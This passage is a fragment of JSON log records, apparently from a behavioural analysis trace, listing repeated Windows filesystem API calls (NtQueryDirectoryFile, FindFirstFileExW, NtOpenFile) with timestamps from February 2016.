"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,137", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,137", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,137", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,137", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,307", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", 
"api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:38,347", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,377", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
